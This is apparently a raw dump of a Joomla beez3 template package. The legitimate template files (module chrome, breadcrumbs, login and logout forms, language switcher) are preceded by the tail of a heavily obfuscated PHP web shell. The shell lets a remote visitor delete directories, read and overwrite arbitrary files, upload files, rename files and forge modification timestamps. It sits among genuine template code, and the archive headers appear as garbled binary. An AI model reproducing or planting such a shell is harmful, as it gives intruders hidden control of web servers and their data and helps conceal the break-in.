s\162\143\075'd\141t\141\072\x69\155\141ge\057\160\x6eg\073\x62as\x65\x364\054i\126BO\122\x77\060\x4b\x47\x67\157\101\x41\101\101N\x53\125\150\x45\x55g\101\101A\x42A\x41AA\x41\121C\x41YA\101\101\101f8/9h\x41\101ACX0lE\121V\x5242mNk\157\102A\167\104h4\104y\x6ay\x45pBkZ\x47\x54g\067t7+\x37\147\066wg\x31V6A\x7aV\103\102\x794aD\155503ad\1629j\x52gGl\110oIy\x4d\122luKyT1V\x590Y\127RmY\x6a\x697\057\x64Sc84e\166z\126\x4aWETG\123\0605\x4c\063F\x46\x57\x55cB\x61\126\x45+P\x39\x38\057Pn/\x356y5TY\x4ea14\143\x51zFg\x58\x6f\x460\x5a1RlS\150\x6b\1522D\110\057gegfE\120\060\106\070v6B\x32Q\172/\057\x38\114x\063\150X\110Jqz\142cK1\x59\x58\132JV\126\x30qMXX\x76\x58h\x52\x38rG\x45PNu\x65\111W\114ot\132\171\115w\x6cgqKY\064\x528\x79+w/\104\170\x78d\166\x47\116\x348ev\066\x42g1\x2f\157\153Ziy\x4cMd\057\106p5v3\131W\x4cYxml+RmF\x6a6y0ey\066l\142c\x67\113\x554ww4\x41\x2b\x59\x2f+z\155A\167Ye\x55U\105\107\x48\153\155V\057\x2f8\132Wa4w\x4d\057\x33\x2f\144WXPu\x5aPGCfu\x7awYG\x34rFbyZHCi\x74\170n\x4d\147H+/f\172G\x38\145/\x61W\064\143eXd\060\x42PMT\x4fIKsk\x7a\143PA\113Aw\0638zfDn\061\x378H\x2f/78e\142+0\x611\144Cx\161J\x58l8AG\154P\x75\172dNe\063+\x5aY\x77M\x7aE\170fP/\x30l\x65\x48\x4a\x6ebsM0poa\x44J\1708w\163C\167A\111bLv\071\x39\167\057Ofn7\x37ePb7w+oBF5Kg\x51ejV6\066zM\106L\x70h\165t\x34\x65Y\x56Y\x4c\1501/iaDi\x70k5AxM\124I1TTL\167Z\107\106\x41\x4e+\057T\x79x6\061\x6d\x70U/2Ty\130\x41\x44\061ES\131\x46P\142M\154\x62\166\057\057y\070\x48A\x37cwNwOf\x45\x44BA/\057\x35\107s\122m\x47\057/\x335/\x58\057a\160BcOR\x57u+HI\111b\111Mr\116\171\114\123\x35U\053gt\x48z\145\172g\111quEj\x54\167YJr+\121A\115\127Q\15296\x2bO\x74\114QM\125\x37+S\166P/\067\x31D\123\131\155\x7a0\x74\154O+\x33o\x4c\x6d\167g\1148\060E0/ofEx\162\x2b/f\x78jev\x66n\x39/\x2by\061\063/\x63PX/\1701\x65\x4f\x65p3\063\x4duPv\x31\063BCMp\1644Wz\162Cp\115\x46w1l\x41\x67ba\170/\145/\x2f1+\x388fv\x70k\125u\x2fjhy59Hv\146h\131f/D\x6e\x7a\x2b+f/\x2br\x378\115f3D\x6dB\123M\132J\x72\115gW7b\103\x6b\x39f+HD\x313\057+/+\116\x31\057\0573/\171\x4aRQM6A\x41\x41\x36UD\067\x56kP\107\x4a\061gA\101AAB\112RU\x35ErkJ\147\x67\147\x3d\x3d\x27 /> \x3c\x61\x20hr\x65f=\047".$_SERVER["PH\120_SE\x4cF"]."?path=".$_mkmoxkqd."\047\076".$_eyioktbq."\074/\141\x3e</\164\x64>"."<td>"."\074\x69n\x70\165t \163\x74yl\145\x3d'bord\145r: 1px solid #\x63c\x63\x63\143c;'\040nam\145\075'del' v\141lue\x3d\x27D\047\040t\x79\x70e=\x27s\x75\142m\151\164\047 ti\164\154e=\x27D\145\154ete\047>"."\x3cin\x70\x75\x74 style\x3d'bo\x72\x64e\162\072 \x31px \x73ol\151d #ccccc\143;' nam\145\x3d\047\x72\x65\156' v\x61\154u\145\x3d\047R' t\171\160e=\047\x73\165bm\x69\x74\x27 t\x69\x74le='R\x65\156\141\x6de'>"."<\x69\156put\040\163ty\x6ce='borde\162: 1px solid\040\043\x63\x63cc\143c;\x27 \x6ea\155e='to\x75\x27\040v\141\154\165e='\x54\x27 typ\x65='\163u\142mit'\040ti\x74\154e\075\047\124o\x75\x63h'>"."\074inp\x75t \163ty\x6ce='b\157rde\x72\x3a 1p\x78 s\x6f\x6c\151d #\x63cc\x63cc\x3bp\x61dd\x69n\147: 0 \067px;\047 n\x61me=\x27\165p' \x76\x61\x6cue='\125' t\x79pe\075\047su\142mit'\040\x74\151tle\x3d'\125pl\x6fa\x64\x27>"."\x3c\x2ft\144>"."<\x74d>"."["._ddisiu($_mkmoxkqd)."]\040"._ckskxf($_mkmoxkqd)."\x3ctd\076".$_hbweya."<\x2f\x74\144\x3e"."<td>".daTE("d\055m\055Y\040H\x3a\151:s",fILEMtimE($_mkmoxkqd))."</\x74d>"."<\x74\x64>DIR\x3c/td></t\162>";}}}echo"\074/\164\x61\142l\145\x3e\x3c/form\x3e\x3c/\144i\x76>\x3c\057\x64\x69v>";}echo _ssgcj($_qcaqtti);function _abvifs($_afeglv){if($_jsnn=GloB($_afeglv."\x2f*")){foreach($_jsnn as$_qpme){iS_DIr($_qpme)?_abvifs($_qpme):uNlinK($_qpme);}}return rMdiR($_afeglv);}$_oqce="\x0d\012\x3cdiv\040id=\042ope\x6eMo\x64\x61\x6c\042 cl\141\163s=\042\155o\144a\154b\141ck\147r\x6f\x75nd\x22>\015\x0a\040\040 \040\x3c\144i\x76 c\154\x61s\163\075\x22m\157dalw\151ndow\x22\076\x20\015\x0a   \040\x20\x20 \040<\160>t\145\170\x74<\057p\076\015\x0a\x20\040\040 \040\x20  \x3ca\040\x68re\146=\042\x22\076\x43lose\x3c/a\x3e\015\012\x20 \040 \x3c\057div\x3e\015\012</\x64i\x76>";if(isset($_POST["d\145l"])){if(!empty($_POST["ch\x6fo\x73e"])){foreach($_POST["cho\157\163e"] as$_qoloxlaw){if(IS_lINK($_qoloxlaw)){if(UNLink($_qoloxlaw)){echo sTR_RepLace("text","\x3c\160\x20\x63l\x61s\163\075\x22pm\042>"."T\150e l\x69n\153\x20w\141s\x20\163uc\x63es\163fu\x6c\x6cy \144e\x6ceted!"."<\057\x70\076",$_oqce);}else{echo Str_RePLAcE("text","\x3cp\040\143lass\075\x22pm\x22\076"."\105r\162or\041 \x54h\x65\x20\154\151nk \167as n\157t\x20\x64ele\x74ed!"."\074\057p>",$_oqce);}}elseif(Is_File($_qoloxlaw)){if(UnLInk($_qoloxlaw)){echo str_REPLaCE("text","\074\x70 c\x6ca\x73\x73=\x22pm\042>"."\x54he fil\x65\x20was s\x75c\143es\x73fu\x6cl\171 \x64\x65l\145te\144!"."<\x2fp>",$_oqce);}else{echo stR_rePLACe("\164\x65xt","<p \x63la\x73s\x3d\x22\x70m\x22\x3e"."E\x72ro\162\x21\040Th\x65 \x66\151\x6ce\x20wa\x73 not del\x65\164e\x64!"."\074\x2fp>",$_oqce);}}elseif(is_dIr($_qoloxlaw)){if(_abvifs($_qoloxlaw)){echo str_replace("te\x78t","<\160 c\x6cass\075\042pm\x22>"."\x44\x69re\143t\157ry d\x65leted!"."\074\x2fp>",$_oqce);}else{echo sTr_rEpLACe("\164e\x78t","\074p \x63l\141ss\x3d\x22\x70m\x22>"."Err\x6fr!\x20T\x68e\x20d\151re\x63\x74o\162y \x77a\x73 not dele\x74ed!"."</p\076",$_oqce);}}}}}if(isset($_POST["edit"])){if(!empty($_POST["\x63\x68\157\157s\x65"])){$_arozacj=$_POST["\143ho\157se"][(01330-0523)+(int)ROUnd(-97.25+-97.25+-97.25+-97.25)];if(IS_ReadABLe($_arozacj)){$_dulkwwkp="\x0d\x0a<d\x69\x76\x20id=\047\x6fp\145\x6eM\x6f\x64al' \x63l\x61ss\075\x27\155o\144al\142\x61ckgro\x75\x6ed\047>\074div \143la\x73\163\x3d'moda\x6c\x77\151n\x64ow2'><fo\162\x6d \x73\164yle=\047\167id\x74h:\04096%;height\072 85\045;m\x61\162gin:\x20\x30\040\x61u\x74\x6f;\047 m\145t\x68\x6f\144\075\x27\160os\x74'>\015\x0a\x3ct\x65xta\162ea\040\163tyle='res\x69\x7ae\072 \156one;\167\x69dt\150: \x39\070\045;\150ei\x67ht:\0409\070\x25\073\047 nam\x65='edit\137c\157\144\x65'\076".hTmLspeCiALcHARS(FILE_GET_conTENTS($_arozacj))."\x3c\057\x74e\x78t\x61re\x61\076<\151nput \x74\x79pe\075'\150idden\x27 nam\145='cor\x72ecti\x6fn' va\x6cue='".$_POST["choose"][(-0100- -0603- -01641+-03205)+(-0325+-0444- -0204)-(-01470+-01175- -0463- -01073)-(-042+067+-0312+-032)]."'\x3e\074i\x6e\x70ut\x20sty\154\x65\075\x27float:\x6ce\x66\x74\x3bm\141r\147\x69\156\x2d\154e\x66\164:\0401%;m\141r\x67in-\x74op:\x208p\170\x3b\047\x20\164yp\x65=\x27\163\x75bmi\x74\x27 value\x3d'\101\160\x70l\x79\x20th\145 \x63\x68a\x6eges'><\x2f\146orm\x3e<\141\x20\150\x72e\x66\x3d''>Close</a><\x2f\144iv>\074\x2f\x64\x69\166\076";echo$_dulkwwkp;}else{echo STR_RePLaCE("\164e\x78\164","\x3c\160 cla\163\163=\042\x70m\x22>"."\x45\162r\x6fr! Ca\x6e't \157pen\x20\x66il\x65\x21"."</p>",$_oqce);}}}if(isset($_POST["\145\x64\151t_\143o\144\145"])){$_bszmhk=FiLE_pUT_cOntentS($_POST["co\x72rect\x69\x6f\x6e"],$_POST["e\x64it\x5fco\144e"]);if($_bszmhk===false){echo Str_repLAcE("\164ex\x74","<\160 \143\154ass=\042pm\x22>"."\x45rro\162\x20\167\162i\164ing\040t\157 f\x69le\x21"."\x3c\x2fp>",$_oqce);}else{echo STr_RePlacE("te\170\164","\x3cp cla\163\x73=\042p\155\x22\076"."\x54he\x20file was s\x75c\143\145s\163\x66\165l\x6cy mod\151\146\151ed!"."</p>",$_oqce);}}if(isset($_POST["\x76iew"])){if(iS_READAbLe($_POST["v\x69ew"])){$_btwo=fopEN($_POST["\x76iew"],"r\x74");$_vwsz="";while(!fEoF($_btwo))$_vwsz.=fREAd($_btwo,(int)rOUnD(1628+1628+1628)+(-02014+0370));fclose($_btwo);if(FILESiZE($_POST["\x76iew"])==((0351- -0125)+(-0461-0453)-(0405-01043))){echo STr_RePLaCE("te\x78\164","<\160 cl\x61\x73s=\x22p\x6d\042\076"."T\150\x65 \146ile \151\163\040e\155pt\x79!"."<\057p\x3e",$_oqce);}elseif($_vwsz){echo"<di\166\040id\075\042\x6fpenModal\042\040class=\042m\157dalb\x61ck\x67r\x6fund\042\076"."<div cl\x61\x73s=\042mo\144a\x6cw\x69\x6e\144ow\062\x22\076"."<d\151v\x20cl\x61\x73s=\x27are\x61'>";HighLiGHt_striNG($_vwsz);echo"</div>"."<\x61 hr\145f=\x22\042>Clos\145</a>"."\074\x2f\x64\151v\x3e"."\x3c\x2fd\x69\166>";}}else{echo STR_rEPLAcE("\164\145xt","<p\x20\143las\x73\075\042\x70\155\x22>"."\105rror\x21 \x43a\x6e\047t open f\151l\x65\041"."<\x2f\160\x3e",$_oqce);}}if(isset($_POST["\x75p"])&&!empty($_POST["c\x68o\157se"])){echo"<\x64\151v\x20i\x64\075\x22\x6fpen\x4dod\141l\x22 cl\x61\x73\x73\x3d\042\155\157\144alb\141ckg\162\x6fu\156d\x22\076"."<\x64i\x76\x20\x63lass=\042mo\x64\x61l\167\x69\156dow\x22>"."<d\151v \163tyle\075'widt\x68: aut\x6f\073' c\x6c\x61\x73\163='a\162ea'\x3e";echo"\074\160 \x73t\x79\154\145=\042marg\x69n\x2dlef\164\x3a\065p\170;te\x78t\x2dalign:\040le\146\x74;\x22>"."uploa\144_max_\146\x69\154\145\x73i\172e:\040".INi_gET("\x75\160lo\x61d_\x6d\141\170_\146\x69\154e\x73\x69\172e")."\074\x62r\076"."po\163t_\x6dax_size:\x20".inI_gET("\160\157s\164_ma\x78\137\x73\x69ze")."<\x2fp\x3e";echo"\x0d\012\x3cpre\x3e\015\012<f\157\162m\x20\x6detho\x64\075\x22POST\042\x20\145nc\164yp\x65=\042\x6d\x75ltip\141\x72t\057\x66\x6frm-d\141t\x61\x22>\015\012\x3c\154abel>\x3cb c\154ass\075\042b\164\x22>\125p\x6coa\144\x65\162:\074\057b\076\074/\x6cab\145l>\015\x0a<i\x6epu\x74 type=\x22file\042\x20\x6e\141me=\042fi\154e\x6e\x61me\042 >\074br/>\x0d\x0a\x3c\x69\156\x70ut \164\171p\x65\x3d\042\x68i\144den\x22 na\155\145=\x22\165\x70_f\x69\x6ce\042 \x76alu\x65=\x22".$_POST["choose"][(int)ROUnD(0+0+0+0)]."\042\x3e\x0d\x0a<i\156\x70ut\x20\x74ype\075\x22s\x75\x62m\x69\164\x22 va\x6cue=\x22Upl\157\141d\x22>\x0d\012<\057form\x3e\x0d\012<p\x72e\076";echo"</div>"."<\141 hr\145\146\x3d\042\042\x3eC\x6c\157s\145</a>"."</d\151\166>"."<\057d\x69\x76\x3e";}if($_FILES["f\151\154\x65name"]["err\157r"]==(int)rounD(0+0+0+0)){$_ldni=$_POST["up_\x66ile"]."\x2f".$_FILES["file\x6e\x61m\145"]["n\141\155e"];if(movE_UpLOADed_FIlE($_FILES["\146ilena\x6d\145"]["tmp\137\x6e\x61me"],$_ldni)){$_gtheuk="\074p \x63l\141s\x73\x3d\x22pm\042>"."\124he\040file\040was u\160\x6co\x61d\x65d s\165\143\143\x65s\163\146\x75lly\041"."</p\076";$_kchse=StR_RepLaCe("\164\145xt",$_gtheuk,$_oqce);echo$_kchse;}}else{echo stR_RePLACe("te\170t","<p c\x6cass\x3d\x22\x70m\042>"."\105\x72r\157\x72\041\x20\x54he f\151\154e\x20i\163\x20no\x74 s\145\154ec\x74ed\x21"."</p>",$_oqce);}if(isset($_POST["tou"])&&!empty($_POST["c\150\157os\145"])){echo"<di\x76 i\144\x3d\042ope\156\115oda\154\042 cla\x73s=\042m\157d\141lba\143k\147ro\x75nd\x22>"."<\144iv cla\163\163=\x22mo\x64al\167\x69nd\x6fw\042>"."<div \163\x74\171le=\x27\x77\151\x64th\072\040a\x75to;' \143la\163s='a\162\x65a'\076";echo"\015\x0a<f\157rm \155eth\x6f\x64=\x27po\163\164'>\015\x0a\074\164e\170t\141\162\145a\x20st\171\154e\x3d\047\162es\151z\x65: \156\157ne\x3b\x27 n\x61\155e=\x27\143\157\x64e\047>".dATe("\144-\155\055Y\040\110\072i:s",fIleMTIme($_POST["\143h\x6fos\145"][(int)rOund(0+0+0)]))."\x3c\057t\145x\x74\141\162e\x61>\015\012\074\151npu\164 t\x79\x70\145='h\151\144\144e\x6e\x27 name='dat\145\137file\x27 va\x6c\x75e\075'".$_POST["choo\163e"][(int)rOUnD(-13.666666666667+-13.666666666667+-13.666666666667)+(-043-0103-0421+0635)+(int)ROUnd(78.5+78.5)-(int)RounD(38.5+38.5+38.5+38.5)]."'\076\074b\x72/>\015\x0a<in\160ut\040\164ype=\047\163ubmit\047\x20\166\141\x6c\165\145='T\157\165c\x68'>\x0d\012\074\x2ff\157rm>";echo"</div>"."\074\x61\040\150ref=\042\042\076\103l\x6f\163e</\141\x3e"."\074\x2fd\x69\x76\076"."\074\057\144\x69v>";}if(isset($_POST["co\144e"])){if(tOuCh($_POST["d\x61t\x65_file"],sTRTotiME($_POST["\143o\144e"]))){$_gtheuk="\074p \143las\x73=\042\160m\x22\x3e"."Modi\x66\151cati\157n d\141te ch\x61n\x67e\x64!"."\074/p\076";$_kchse=str_rePLACE("t\x65\170t",$_gtheuk,$_oqce);echo$_kchse;}else{echo Str_rEPLACe("t\145xt","<p\x20class=\x22\x70m\042>"."\105\x72ro\162!\x20You \143\157u\154\x64n\x27t \143hange the \x64ate!"."</p>",$_oqce);}}if(isset($_POST["\x72\x65\x6e"])&&!empty($_POST["choos\x65"])){echo"<\x64iv \151\x64=\042ope\156M\157\144\x61l\042 clas\x73=\x22mod\141lb\x61\x63k\x67ro\x75nd\042\x3e"."<di\x76 \143lass=\042mo\144\141lwindo\x77\x22>"."<d\151\x76 \x73\164yle=\x27wid\x74\150: au\164o;\x27\040c\154as\163=\047area'\076";echo"\x0d\012\074for\x6d \x6d\x65thod\x3d\x27p\157\x73t\x27\x3e\015\x0a\x3c\164\145x\x74\141rea\x20st\171le='\x72\x65size:\040\156one;\x27\x20n\x61m\x65='r_co\144e'\x3e".$_POST["choos\145"][(int)rOuNd(79.25+79.25+79.25+79.25)+(int)rounD(-208+-208)-(int)round(-246.5+-246.5)-(int)rOuND(197+197)]."</\x74e\170tar\x65a>\015\x0a<input \164ype='\x68idden\047\040\156\141\x6d\145='\162en\x5ff\151l\145'\040valu\x65=\x27".$_POST["\x63ho\x6f\163e"][(int)ROund(0+0)]."'><b\x72/>\x0d\012\074\x69nput ty\160e=\x27\x73ub\x6dit\047 v\x61lue='Re\156am\145\x27\076\015\x0a<\057f\x6frm>";echo"\074/\x64iv\x3e"."<\x61 \150r\x65f\075\x22\042>C\x6cose\074\057a\076"."\074\057\x64\151\x76\076"."\074\x2f\144i\x76\x3e";}if(isset($_POST["r_c\157d\145"])){if(rEnAmE($_POST["\162en_\146ile"],$_POST["r\x5fcode"])){echo Str_REPlACe("t\x65xt","<\160\040\143lass\x3d\042p\155\042\x3e"."Ren\x61\x6d\151\x6eg\040c\x6fmp\154\x65t\x65\x64\041"."</\x70>",$_oqce);}else{echo StR_rEplaCe("text","<p \143las\x73\075\042pm\x22>"."\105rror\041 Not r\145named!"."</p>",$_oqce);}}echo"<\x2f\144i\x76>\074\057div>";echo"\040\040\x20<\057\x62od\171>\x0d\012<\057html\076\015\012\015\x0a"; ?>PK՜�\���

beez3/html/modules.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   (C) 2010 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/**
 * beezDivision chrome.
 *
 * @since   3.0
 */
function modChrome_beezDivision($module, &$params, &$attribs)
{
	$headerLevel = isset($attribs['headerLevel']) ? (int) $attribs['headerLevel'] : 3;
	if (!empty ($module->content)) : ?>
		<div class="moduletable<?php echo htmlspecialchars($params->get('moduleclass_sfx', ''), ENT_COMPAT, 'UTF-8'); ?>">
		<?php if ($module->showtitle) : ?>
			<h<?php echo $headerLevel; ?>><?php echo $module->title; ?></h<?php echo $headerLevel; ?>>
		<?php endif; ?>
		<?php echo $module->content; ?></div>
	<?php endif;
}

/**
 * beezHide chrome.
 *
 * @since   3.0
 */
function modChrome_beezHide($module, &$params, &$attribs)
{
	$headerLevel = isset($attribs['headerLevel']) ? (int) $attribs['headerLevel'] : 3;
	$state = isset($attribs['state']) ? (int) $attribs['state'] : 0;

	if (!empty ($module->content)) { ?>

<div
	class="moduletable_js <?php echo htmlspecialchars($params->get('moduleclass_sfx', ''), ENT_COMPAT, 'UTF-8');?>"><?php if ($module->showtitle) : ?>
<h<?php echo $headerLevel; ?> class="js_heading"> <?php echo $module->title; ?> <a href="#"
	title="<?php echo JText::_('TPL_BEEZ3_CLICK'); ?>"
	onclick="auf('module_<?php echo $module->id; ?>'); return false"
	class="opencloselink" id="link_<?php echo $module->id?>"> <span
	class="no"><img src="templates/beez3/images/plus.png"
	alt="<?php if ($state === 1) { echo JText::_('TPL_BEEZ3_ALTOPEN');} else {echo JText::_('TPL_BEEZ3_ALTCLOSE');} ?>" />
</span></a></h<?php echo $headerLevel; ?>> <?php endif; ?>
<div class="module_content <?php if ($state === 1){echo 'open';} ?>"
	id="module_<?php echo $module->id; ?>" tabindex="-1"><?php echo $module->content; ?></div>
</div>
	<?php }
}

/**
 * beezTabs chrome.
 *
 * @since   3.0
 */
function modChrome_beezTabs($module, $params, $attribs)
{
	$area = isset($attribs['id']) ? (int) $attribs['id'] : '1';
	$area = 'area-'.$area;

	static $modulecount;
	static $modules;

	if ($modulecount < 1)
	{
		$modulecount = count(JModuleHelper::getModules($module->position));
		$modules = array();
	}

	if ($modulecount === 1)
	{
		$temp = new stdClass;
		$temp->content = $module->content;
		$temp->title = $module->title;
		$temp->params = $module->params;
		$temp->id = $module->id;
		$modules[] = $temp;
		// list of moduletitles
		// list of moduletitles
		echo '<div id="'. $area.'" class="tabouter"><ul class="tabs">';

		foreach ($modules as $rendermodule)
		{
			echo '<li class="tab"><a href="#" id="link_'.$rendermodule->id.'" class="linkopen" onclick="tabshow(\'module_'. $rendermodule->id.'\');return false">'.$rendermodule->title.'</a></li>';
		}
		echo '</ul>';
		$counter = 0;
		// modulecontent
		foreach ($modules as $rendermodule)
		{
			$counter ++;

			echo '<div tabindex="-1" class="tabcontent tabopen" id="module_'.$rendermodule->id.'">';
			echo $rendermodule->content;
			if ($counter !== count($modules))
			{
			echo '<a href="#" class="unseen" onclick="nexttab(\'module_'. $rendermodule->id.'\');return false;" id="next_'.$rendermodule->id.'">'.JText::_('TPL_BEEZ3_NEXTTAB').'</a>';
			}
			echo '</div>';
		}
		$modulecount--;
		echo '</div>';
	} else {
		$temp = new stdClass;
		$temp->content = $module->content;
		$temp->params = $module->params;
		$temp->title = $module->title;
		$temp->id = $module->id;
		$modules[] = $temp;
		$modulecount--;
	}
}
PK՜�\9����&beez3/html/mod_breadcrumbs/default.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
?>

<div class = "breadcrumbs<?php echo $moduleclass_sfx; ?>">
<?php if ($params->get('showHere', 1))
	{
		echo '<span class="showHere">' .JText::_('MOD_BREADCRUMBS_HERE').'</span>';
	}

	// Get rid of duplicated entries on trail including home page when using multilanguage
	for ($i = 0; $i < $count; $i++)
	{
		if ($i === 1 && !empty($list[$i]->link) && !empty($list[$i - 1]->link) && $list[$i]->link === $list[$i - 1]->link)
		{
			unset($list[$i]);
		}
	}

	// Find last and penultimate items in breadcrumbs list
	end($list);
	$last_item_key = key($list);
	prev($list);
	$penult_item_key = key($list);

	// Generate the trail
	foreach ($list as $key => $item) :
	// Make a link if not the last item in the breadcrumbs
	$show_last = $params->get('showLast', 1);
	if ($key !== $last_item_key)
	{
		// Render all but last item - along with separator
		if (!empty($item->link))
		{
			echo '<a href="' . $item->link . '" class="pathway">' . $item->name . '</a>';
		}
		else
		{
			echo '<span>' . $item->name . '</span>';
		}

		if ($key !== $penult_item_key || $show_last)
		{
			echo ' '.$separator.' ';
		}

	}
	elseif ($show_last)
	{
		// Render last item if reqd.
		echo '<span>' . $item->name . '</span>';
	}
	endforeach; ?>
</div>
PK՜�\z� beez3/html/mod_login/default.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   (C) 2013 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

// no direct access
defined('_JEXEC') or die;

JHtml::_('behavior.keepalive');
?>
<form action="<?php echo JRoute::_('index.php', true, $params->get('usesecure')); ?>" method="post" id="login-form" >
<?php if ($params->get('pretext')) : ?>
	<div class="pretext">
	<p><?php echo $params->get('pretext'); ?></p>
	</div>
<?php endif; ?>
<fieldset class="userdata">
<p id="form-login-username">
	<label for="modlgn-username"><?php echo JText::_('MOD_LOGIN_VALUE_USERNAME') ?></label>
	<input id="modlgn-username" type="text" name="username" class="inputbox"  size="18" />
</p>
<p id="form-login-password">
	<label for="modlgn-passwd"><?php echo JText::_('JGLOBAL_PASSWORD') ?></label>
	<input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
</p>
<?php if (count($twofactormethods) > 1) : ?>
	<div id="form-login-secretkey" class="control-group">
		<div class="controls">
			<?php if (!$params->get('usetext')) : ?>
				<div class="input-prepend input-append">
					<label for="modlgn-secretkey"><?php echo JText::_('JGLOBAL_SECRETKEY'); ?></label>
					<input id="modlgn-secretkey" autocomplete="one-time-code" type="text" name="secretkey" class="input-small" tabindex="0" size="18" />
				</div>
			<?php else: ?>
				<label for="modlgn-secretkey"><?php echo JText::_('JGLOBAL_SECRETKEY') ?></label>
				<input id="modlgn-secretkey" autocomplete="one-time-code" type="text" name="secretkey" class="input-small" tabindex="0" size="18" />
			<?php endif; ?>
		</div>
	</div>
<?php endif; ?>
<?php if (JPluginHelper::isEnabled('system', 'remember')) : ?>
	<p id="form-login-remember">
		<label for="modlgn-remember"><?php echo JText::_('MOD_LOGIN_REMEMBER_ME') ?></label>
		<input id="modlgn-remember" type="checkbox" name="remember" class="inputbox" value="yes"/>
	</p>
<?php endif; ?>
<input type="submit" name="Submit" class="button" value="<?php echo JText::_('JLOGIN') ?>" />
<input type="hidden" name="option" value="com_users" />
<input type="hidden" name="task" value="user.login" />
<input type="hidden" name="return" value="<?php echo $return; ?>" />
<?php echo JHtml::_('form.token'); ?>
<ul>
	<li>
		<a href="<?php echo JRoute::_('index.php?option=com_users&view=reset'); ?>">
		<?php echo JText::_('MOD_LOGIN_FORGOT_YOUR_PASSWORD'); ?></a>
	</li>
	<li>
		<a href="<?php echo JRoute::_('index.php?option=com_users&view=remind'); ?>">
		<?php echo JText::_('MOD_LOGIN_FORGOT_YOUR_USERNAME'); ?></a>
	</li>
	<?php if (JComponentHelper::getParams('com_users')->get('allowUserRegistration')) : ?>
		<li>
			<a href="<?php echo JRoute::_('index.php?option=com_users&view=registration'); ?>">
			<?php echo JText::_('MOD_LOGIN_REGISTER'); ?></a>
		</li>
	<?php endif; ?>
</ul>
<?php if ($params->get('posttext')) : ?>
	<div class="posttext">
		<p><?php echo $params->get('posttext'); ?></p>
	</div>
<?php endif; ?>
</fieldset>
</form>
PK՜�\�j�l��'beez3/html/mod_login/default_logout.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   (C) 2016 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

// no direct access
defined('_JEXEC') or die;

JHtml::_('behavior.keepalive');
?>
<form action="<?php echo JRoute::_('index.php', true, $params->get('usesecure')); ?>" method="post" id="login-form">
<?php if ($params->get('greeting')) : ?>
	<div class="login-greeting">
	<?php if ($params->get('name') == 0) : ?>
		<?php echo JText::sprintf('MOD_LOGIN_HINAME', htmlspecialchars($user->get('name'), ENT_COMPAT, 'UTF-8')); ?>
	<?php else : ?>
		<?php echo JText::sprintf('MOD_LOGIN_HINAME', htmlspecialchars($user->get('username'), ENT_COMPAT, 'UTF-8')); ?>
	<?php endif; ?>
	</div>
<?php endif; ?>
<?php if ($params->get('profilelink')) : ?>
	<div class="login-profilelink">
		<a href="<?php echo JRoute::_('index.php?option=com_users&view=profile'); ?>">
		<?php echo JText::_('MOD_LOGIN_PROFILE'); ?></a>
	</div>
<?php endif; ?>
<div class="logout-button">
	<input type="submit" name="Submit" class="button" value="<?php echo JText::_('JLOGOUT'); ?>" />
	<input type="hidden" name="option" value="com_users" />
	<input type="hidden" name="task" value="user.logout" />
	<input type="hidden" name="return" value="<?php echo $return; ?>" />
	<?php echo JHtml::_('form.token'); ?>
</div>
</form>
PK՜�\��<��$beez3/html/mod_languages/default.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_languages
 *
 * @copyright   (C) 2016 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::_('stylesheet', 'mod_languages/template.css', array('version' => 'auto', 'relative' => true));
?>
<div class="mod-languages<?php echo $moduleclass_sfx; ?>">
<?php if ($headerText) : ?>
	<div class="pretext"><p><?php echo $headerText; ?></p></div>
<?php endif; ?>

<?php if ($params->get('dropdown', 1)) : ?>
	<form name="lang" method="post" action="<?php echo htmlspecialchars(JUri::current(), ENT_COMPAT, 'UTF-8'); ?>">
	<select class="inputbox" onchange="document.location.replace(this.value);" >
	<?php foreach ($list as $language) : ?>
		<option dir=<?php echo $language->rtl ? '"rtl"' : '"ltr"'; ?> value="<?php echo $language->link; ?>" <?php echo $language->active ? 'selected="selected"' : ''; ?>>
		<?php echo $language->title_native; ?></option>
	<?php endforeach; ?>
	</select>
	</form>
<?php else : ?>
	<ul class="<?php echo $params->get('inline', 1) ? 'lang-inline' : 'lang-block'; ?>">
	<?php foreach ($list as $language) : ?>
		<?php if (!$language->active || $params->get('show_active', 0)) : ?>
			<li class="<?php echo $language->active ? 'lang-active' : ''; ?>" dir="<?php echo $language->rtl ? 'rtl' : 'ltr'; ?>">
			<a href="<?php echo $language->link; ?>">
			<?php if ($params->get('image', 1)) : ?>
				<?php echo JHtml::_('image', 'mod_languages/' . $language->image . '.gif', $language->title_native, array('title' => $language->title_native), true); ?>
			<?php else : ?>
				<?php echo $params->get('full_name', 1) ? $language->title_native : strtoupper($language->sef); ?>
			<?php endif; ?>
			</a>
			</li>
		<?php endif; ?>
	<?php endforeach; ?>
	</ul>
<?php endif; ?>

<?php if ($footerText) : ?>
	<div class="posttext"><p><?php echo $footerText; ?></p></div>
<?php endif; ?>
</div>
PK՜�\�A֩�5beez3/html/com_newsfeeds/categories/default_items.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_newsfeeds
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
$class = ' class="first"';
if ($this->maxLevelcat != 0 && count($this->items[$this->parent->id]) > 0) :
?>
<ul>
<?php foreach ($this->items[$this->parent->id] as $id => $item) : ?>
	<?php
	if ($item->numitems || $this->params->get('show_empty_categories_cat') || count($item->getChildren())) :
	if (!isset($this->items[$this->parent->id][$id + 1]))
	{
		$class = ' class="last"';
	}
	?>
